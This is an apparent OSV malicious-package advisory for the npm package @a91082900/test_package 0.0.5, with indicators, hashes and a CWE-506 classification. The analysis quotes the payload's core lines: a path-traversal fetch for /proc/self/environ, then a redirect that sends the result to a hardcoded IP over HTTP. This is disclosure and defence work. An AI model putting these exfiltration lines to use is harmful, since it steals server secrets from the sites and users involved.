{"id":"MAL-2026-3680","summary":"Malicious code in @a91082900/test_package (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (b8349cd7ce2c9ac2321dce8f80e5a46c0064b382fb7e54e975ff27a2dcab1254)\nThe package's main file (index.js) executes at module load, with no exports and no user-invoked API. On import it issues `fetch('/api/notes?id=/self/proc/environ')` and then assigns `top.location = 'http://128.199.217.232/?notes=' + encodeURIComponent(data)`, relaying whatever the vulnerable endpoint returns (a path-traversal-shaped request for the server process's environment variables) to a hardcoded bare IPv4 address over plain HTTP. Package metadata is placeholder ('no description', generic author handle) and there is no library functionality — this is a PoC/exfil payload packaged as an npm module. Any installer bundling this into a web application would redirect victim browsers to the attacker IP with exfiltrated data in the query string. Import-time execution + hardcoded bare-IP C2 + plaintext HTTP + a request path specifically crafted to read `/proc/self/environ` together leave no benign interpretation.\n","modified":"2026-05-13T20:22:15.882993Z","published":"2026-05-12T18:00:18Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","id":"IN-MAL-2026-002549","versions":["0.0.5"],"import_time":"2026-05-13T20:10:59.684865697Z","sha256":"b8349cd7ce2c9ac2321dce8f80e5a46c0064b382fb7e54e975ff27a2dcab1254","modified_time":"2026-05-12T19:03:07Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@a91082900/test_package/v/0.0.5"}],"affected":[{"package":{"name":"@a91082900/test_package","ecosystem":"npm","purl":"pkg:npm/%40a91082900/test_package"},"versions":["0.0.5"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@a91082900/test_package/MAL-2026-3680.json","indicators":{"domains":["128.199.217.232"],"urls":["http://128.199.217.232/?notes="],"package_integrity":[{"hashes":{"sha512_sri":"sha512-POWq7EUvxvBu1E7lmICVq2qc+qa8kcaYdeYAW7tDIhEReNLFNRSYSvGkGj17boeS2ASU8amp4jvnW4+g4x7JeQ==","sha1":"2de1cb4b995ed0e3e15607ad85dcd0e73c18439a"},"filename":"test_package-0.0.5.tgz"}],"evidence_files":[{"tlsh":"4bf0dc0b88e004275f97040b9b62047aa715f817caf4d8713aae431a1f85e60d0702e3","sha256":"d2336e7e177c17da9310bbf1bde62a714d5369b0d334b7e34065a4969ea1ccd2","path":"index.js"}]},"cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}